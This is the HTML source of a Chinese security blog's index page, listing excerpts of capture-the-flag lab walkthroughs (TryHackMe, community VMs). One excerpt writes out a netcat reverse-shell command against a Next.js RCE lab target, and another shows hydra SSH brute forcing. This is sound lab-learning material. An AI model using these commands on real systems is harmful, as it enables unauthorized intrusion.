-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathindex.html
More file actions
221 lines (199 loc) · 32.7 KB
/
index.html
File metadata and controls
221 lines (199 loc) · 32.7 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>再努力一点,她是不是就会回来 - cyl-blog</title><meta name="author" content="陈羽琳"><meta name="copyright" content="陈羽琳"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="每天能不能pwn一点">
<meta property="og:type" content="website">
<meta property="og:title" content="再努力一点,她是不是就会回来">
<meta property="og:url" content="https://cyl-love.github.io/index.html">
<meta property="og:site_name" content="再努力一点,她是不是就会回来">
<meta property="og:description" content="每天能不能pwn一点">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cyl-love.github.io/img/1.jpg">
<meta property="article:author" content="陈羽琳">
<meta property="article:tag" content="努力一点">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cyl-love.github.io/img/1.jpg"><script type="application/ld+json">{
"@context": "https://schema.org",
"@type": "WebSite",
"name": "再努力一点,她是不是就会回来",
"url": "https://cyl-love.github.io/"
}</script><link rel="shortcut icon" href="/img/1.jpg"><link rel="canonical" href="https://cyl-love.github.io/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><script>
(() => {
const saveToLocal = {
set: (key, value, ttl) => {
if (!ttl) return
const expiry = Date.now() + ttl * 86400000
localStorage.setItem(key, JSON.stringify({ value, expiry }))
},
get: key => {
const itemStr = localStorage.getItem(key)
if (!itemStr) return undefined
const { value, expiry } = JSON.parse(itemStr)
if (Date.now() > expiry) {
localStorage.removeItem(key)
return undefined
}
return value
}
}
window.btf = {
saveToLocal,
getScript: (url, attr = {}) => new Promise((resolve, reject) => {
const script = document.createElement('script')
script.src = url
script.async = true
Object.entries(attr).forEach(([key, val]) => script.setAttribute(key, val))
script.onload = script.onreadystatechange = () => {
if (!script.readyState || /loaded|complete/.test(script.readyState)) resolve()
}
script.onerror = reject
document.head.appendChild(script)
}),
getCSS: (url, id) => new Promise((resolve, reject) => {
const link = document.createElement('link')
link.rel = 'stylesheet'
link.href = url
if (id) link.id = id
link.onload = link.onreadystatechange = () => {
if (!link.readyState || /loaded|complete/.test(link.readyState)) resolve()
}
link.onerror = reject
document.head.appendChild(link)
}),
addGlobalFn: (key, fn, name = false, parent = window) => {
if (!false && key.startsWith('pjax')) return
const globalFn = parent.globalFn || {}
globalFn[key] = globalFn[key] || {}
globalFn[key][name || Object.keys(globalFn[key]).length] = fn
parent.globalFn = globalFn
}
}
const activateDarkMode = () => {
document.documentElement.setAttribute('data-theme', 'dark')
if (document.querySelector('meta[name="theme-color"]') !== null) {
document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
}
}
const activateLightMode = () => {
document.documentElement.setAttribute('data-theme', 'light')
if (document.querySelector('meta[name="theme-color"]') !== null) {
document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
}
}
btf.activateDarkMode = activateDarkMode
btf.activateLightMode = activateLightMode
const theme = saveToLocal.get('theme')
theme === 'dark' ? activateDarkMode() : theme === 'light' ? activateLightMode() : null
const asideStatus = saveToLocal.get('aside-status')
if (asideStatus !== undefined) {
document.documentElement.classList.toggle('hide-aside', asideStatus === 'hide')
}
const detectApple = () => {
if (/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)) {
document.documentElement.classList.add('apple')
}
}
detectApple()
})()
</script><script>const GLOBAL_CONFIG = {
root: '/',
algolia: undefined,
localSearch: undefined,
translate: undefined,
highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false,"highlightFullpage":false,"highlightMacStyle":true},
copy: {
success: '复制成功',
error: '复制失败',
noSupport: '浏览器不支持'
},
relativeDate: {
homepage: false,
post: false
},
runtime: '',
dateSuffix: {
just: '刚刚',
min: '分钟前',
hour: '小时前',
day: '天前',
month: '个月前'
},
copyright: undefined,
lightbox: 'null',
Snackbar: undefined,
infinitegrid: {
js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid/dist/infinitegrid.min.js',
buttonText: '加载更多'
},
isPhotoFigcaption: false,
islazyloadPlugin: false,
isAnchor: false,
percent: {
toc: true,
rightside: false,
},
autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
title: '再努力一点,她是不是就会回来',
isHighlightShrink: false,
isToc: false,
pageType: 'home'
}</script><meta name="generator" content="Hexo 7.3.0"></head><body><div id="web_bg" style="background-image: url(/img/2.png);"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img text-center"><img src="/img/1.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data text-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">20</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">6</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">6</div></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间线</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="page" id="body-wrap"><header class="full_page" id="page-header" style="background-image: url(/img/2.png);"><nav id="nav"><span id="blog-info"><a class="nav-site-title" href="/"><img class="site-icon" src="/img/1.jpg" alt="Logo"><span class="site-name">再努力一点,她是不是就会回来</span></a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间线</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><span class="site-page"><i class="fas fa-bars fa-fw"></i></span></div></div></nav><div id="site-info"><h1 id="site-title">再努力一点,她是不是就会回来</h1><div id="site_social_icons"><a class="social-icon" href="https://github.com/cyl-love" target="_blank" title="Github"><i class="fab fa-github" style="color: #24292e;"></i></a></div></div><div id="scroll-down"><i class="fas fa-angle-down scroll-down-effects"></i></div></header><main class="layout" id="content-inner"><div class="recent-posts nc" id="recent-posts"><div class="recent-post-items"><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/10268.html" title="TryHackMe之PreSecurity">TryHackMe之PreSecurity</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2026-01-06T03:26:54.000Z" title="发表于 2026-01-06 11:26:54">2026-01-06</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/TryHackMe/">TryHackMe</a></span></div><div class="content">1234本来想来打打tryhackme的靶机,结果被hackpath种草了只收录打tryhackme的部分答案,不涉及知识,tryhackme的知识体系确实很全面友好平台:https://tryhackme.com/视频:https://www.youtube.com/@The_Helpful_Hacker Pre SecurityIntroduction to Cyber SecurityOffensive Security Intro123Which of the following options better represents the process where you simulate a hacker's actions to find vulnerabilities in a system?Offensive Security 12gobuster -u http://fakebank.thm -w wordlist.txt dir-u 用于指定我们要扫描的网站, -w 用来遍历一组单词以查找隐藏的页面。 1根据情景输入即可 Defensi...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/47096.html" title="群友靶机之7r1umph">群友靶机之7r1umph</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:06:56.000Z" title="发表于 2025-12-24 21:06:56">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:12345678910111213靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1依旧是22,80端口 目录扫描 1index.php有一个上传口,/upload和/tmp是可访问文件目录口,/info.php是php的phpinfo,抓包走一遍文件上传逻辑 1文件上传的时候没啥限制,发现上传之后会在upload上但是后缀名加成.dsz,也会出现在/tmp上但是再点击的时候,就显示404,该文件也消失掉了,那思路应该就...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/63247.html" title="群友靶机之5ud0">群友靶机之5ud0</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:06:46.000Z" title="发表于 2025-12-24 21:06:46">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 180端口和22端口,80端口是一个Textpattern CMS,过去看看 80端口探测12345访问一下显示无法访问,发现跳转到了textpattern.dsz 那就把放他到hosts当中sudo vim /etc/hosts192.168.44.153 textpattern.dsz 再次访问,可以正常访问了 nday利用1搜索一下Tex...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/34595.html" title="群友靶机之wechat">群友靶机之wechat</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:06:38.000Z" title="发表于 2025-12-24 21:06:38">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1经典的22,80端口还提示robots.txt了个1.txt 80端口探测ctf小游戏 1进来一眼看到密码的rsa,直接一把梭就好了 1base64加rot13编码 1有一张没有显示出来的图片,base64解码,string分析获得的图片 12将三部分的解码之后可以获得登录凭证flag{welcome:wlc0mE@660930...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/60187.html" title="群友靶机之Vimer">群友靶机之Vimer</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:06:31.000Z" title="发表于 2025-12-24 21:06:31">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 122,80,113端口,113端口泄露了vim用户名,先尝试爆破ssh,再去看看80端口 80端口探测 1是一个vim,没有什么特别的东西 爆破获得用户账号密码12hydra -l vim -P /usr/share/wordlists/rockyou.txt 192.168.44.151 sshvim/000001 ssh连接1ssh vi...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/47936.html" title="群友靶机之victorique">群友靶机之victorique</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:06:09.000Z" title="发表于 2025-12-24 21:06:09">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 域名解析12sudo vim /etc/hosts192.168.44.155 victorique.xyz 域名枚举 12sudo vim /etc/hosts192.168.44.155 victorique.xyz gifts.victorique.xyz 服务探测gifts.victorique.xyz1给了账号和密码 ookami/Go...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/32329.html" title="群友靶机之Regex">群友靶机之Regex</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:06:01.000Z" title="发表于 2025-12-24 21:06:01">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 122,80,5000端口,80端口什么都没有,切入点应该在5000端口上了 服务探测 1进来是一个邮箱验证,目录扫描也没有什么tips点上,常规查看源码发现有一个被注释掉了的邮箱地址,看看有什么用先 1只是单纯的返回了邮箱验证正确,搜regax存在个redos攻击,那么可能验证的邮箱是用的正则匹配,可能存在redos攻击获得报错信息,刚好获得一...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/55978.html" title="群友靶机之React">群友靶机之React</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:05:51.000Z" title="发表于 2025-12-24 21:05:51">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 180,22,3000端口,在3000端口看到是nextjs最新的 CVE-2025-66478 rce漏洞 nday1为了方便后期实现就反弹shell到kali上面,busybox nc 192.168.44.128 4444 -e bash 123456789101112131415161718192021222324252627282930...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/34438.html" title="群友靶机之Open">群友靶机之Open</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:05:42.000Z" title="发表于 2025-12-24 21:05:42">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1依旧经典的80端口加22端口,但是这里的80端口显示重定向到open.dsz,正常直接访问是访问不到的,做了个域名映射 80端口探测12sudo vim /etc/hosts192.168.44.139 open.dsz 远程文件包含12正常进来之后提示是一个远程文件包含(RFI)测试工具通过http://open@格式进行URL处理 反弹s...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/30095.html" title="群友靶机之Monkey">群友靶机之Monkey</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:05:11.000Z" title="发表于 2025-12-24 21:05:11">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:12345678910111213靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1依旧是22,80端口 80端口探索 123进来是一个html,在源代码提示了个域名,依旧放到hosts当中8sudo vim /etc/hosts192.168.44.139 open.dsz 目录扫描 1这里出题人对dirsearch进行了限制,扫不出东西,换成gobuster来试试 tip点切入1234出了两个文件,其实bak.zip...</div></div></div></div><nav id="pagination"><div class="pagination"><span class="page-number current">1</span><a class="page-number" href="/page/2/#content-inner">2</a><a class="extend next" rel="next" href="/page/2/#content-inner"><i class="fas fa-chevron-right fa-fw"></i></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info text-center"><div class="avatar-img"><img src="/img/1.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info-name">陈羽琳</div><div class="author-info-description">每天能不能pwn一点</div><div class="site-data"><a href="/archives/"><div class="headline">文章</div><div class="length-num">20</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">6</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">6</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/cyl-love"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons"><a class="social-icon" href="https://github.com/cyl-love" target="_blank" title="Github"><i class="fab fa-github" style="color: #24292e;"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">Love life, always—loveforver in the small.</div></div><div class="sticky_layout"><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/posts/10268.html" title="TryHackMe之PreSecurity">TryHackMe之PreSecurity</a><time datetime="2026-01-06T03:26:54.000Z" title="发表于 2026-01-06 11:26:54">2026-01-06</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/posts/47096.html" title="群友靶机之7r1umph">群友靶机之7r1umph</a><time datetime="2025-12-24T13:06:56.000Z" title="发表于 2025-12-24 21:06:56">2025-12-24</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/posts/63247.html" title="群友靶机之5ud0">群友靶机之5ud0</a><time datetime="2025-12-24T13:06:46.000Z" title="发表于 2025-12-24 21:06:46">2025-12-24</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/posts/34595.html" title="群友靶机之wechat">群友靶机之wechat</a><time datetime="2025-12-24T13:06:38.000Z" title="发表于 2025-12-24 21:06:38">2025-12-24</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/posts/60187.html" title="群友靶机之Vimer">群友靶机之Vimer</a><time datetime="2025-12-24T13:06:31.000Z" title="发表于 2025-12-24 21:06:31">2025-12-24</time></div></div></div></div><div class="card-widget card-categories"><div class="item-headline">
<i class="fas fa-folder-open"></i>
<span>分类</span>
</div>
<ul class="card-category-list" id="aside-cat-list">
<li class="card-category-list-item "><a class="card-category-list-link" href="/categories/TryHackMe/"><span class="card-category-list-name">TryHackMe</span><span class="card-category-list-count">1</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/solar%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E7%B3%BB%E5%88%97/"><span class="card-category-list-name">solar应急响应系列</span><span class="card-category-list-count">1</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/%E4%B8%80%E4%B8%AA%E7%94%B7%E4%BA%BA%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%94%B9%E5%8F%98%E6%88%91%E7%9A%84%E4%B8%80%E7%94%9F/"><span class="card-category-list-name">一个男人一句话改变我的一生</span><span class="card-category-list-count">3</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/%E5%81%9A%E6%A2%A6%E9%83%BD%E6%83%B3%E8%BF%9Bvn/"><span class="card-category-list-name">做梦都想进vn</span><span class="card-category-list-count">1</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/"><span class="card-category-list-name">群友靶机</span><span class="card-category-list-count">11</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/%E9%87%8D%E7%94%9F%E6%88%91%E8%A6%81%E5%BD%93web%E7%B3%95%E6%89%8B/"><span class="card-category-list-name">重生我要当web糕手</span><span class="card-category-list-count">2</span></a></li>
</ul></div><div class="card-widget card-tags"><div class="item-headline"><i class="fas fa-tags"></i><span>标签</span></div><div class="card-tag-cloud"><a href="/tags/web%E5%AE%89%E5%85%A8/" style="font-size: 1.23em; color: #999ea6">web安全</a> <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 1.1em; color: #999">代码审计</a> <a href="/tags/path/" style="font-size: 1.1em; color: #999">path</a> <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" style="font-size: 1.5em; color: #99a9bf">渗透测试</a> <a href="/tags/ctf/" style="font-size: 1.37em; color: #99a4b2">ctf</a> <a href="/tags/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/" style="font-size: 1.1em; color: #999">应急响应</a></div></div><div class="card-widget card-archives">
<div class="item-headline">
<i class="fas fa-archive"></i>
<span>归档</span>
</div>
<ul class="card-archive-list">
<li class="card-archive-list-item">
<a class="card-archive-list-link" href="/archives/2026/01/">
<span class="card-archive-list-date">
一月 2026
</span>
<span class="card-archive-list-count">1</span>
</a>
</li>
<li class="card-archive-list-item">
<a class="card-archive-list-link" href="/archives/2025/12/">
<span class="card-archive-list-date">
十二月 2025
</span>
<span class="card-archive-list-count">12</span>
</a>
</li>
<li class="card-archive-list-item">
<a class="card-archive-list-link" href="/archives/2025/11/">
<span class="card-archive-list-date">
十一月 2025
</span>
<span class="card-archive-list-count">2</span>
</a>
</li>
<li class="card-archive-list-item">
<a class="card-archive-list-link" href="/archives/2025/10/">
<span class="card-archive-list-date">
十月 2025
</span>
<span class="card-archive-list-count">3</span>
</a>
</li>
<li class="card-archive-list-item">
<a class="card-archive-list-link" href="/archives/2025/08/">
<span class="card-archive-list-date">
八月 2025
</span>
<span class="card-archive-list-count">1</span>
</a>
</li>
<li class="card-archive-list-item">
<a class="card-archive-list-link" href="/archives/2025/07/">
<span class="card-archive-list-date">
七月 2025
</span>
<span class="card-archive-list-count">1</span>
</a>
</li>
</ul>
</div><div class="card-widget card-webinfo"><div class="item-headline"><i class="fas fa-chart-line"></i><span>网站信息</span></div><div class="webinfo"><div class="webinfo-item"><div class="item-name">文章数目 :</div><div class="item-count">20</div></div><div class="webinfo-item"><div class="item-name">本站访客数 :</div><div class="item-count" id="busuanzi_value_site_uv"><i class="fa-solid fa-spinner fa-spin"></i></div></div><div class="webinfo-item"><div class="item-name">本站总浏览量 :</div><div class="item-count" id="busuanzi_value_site_pv"><i class="fa-solid fa-spinner fa-spin"></i></div></div><div class="webinfo-item"><div class="item-name">最后更新时间 :</div><div class="item-count" id="last-push-date" data-lastPushDate="2026-01-06T03:29:54.516Z"><i class="fa-solid fa-spinner fa-spin"></i></div></div></div></div></div></div></main><footer id="footer" style="background-image: url(/img/2.png);"><div class="footer-other"><div class="footer-copyright"><span class="copyright">©2025 - 2026 By 陈羽琳</span><span class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo 7.3.0</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly 5.4.0-b3</a></span></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="darkmode" type="button" title="日间和夜间模式切换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button id="go-up" type="button" title="回到顶部"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>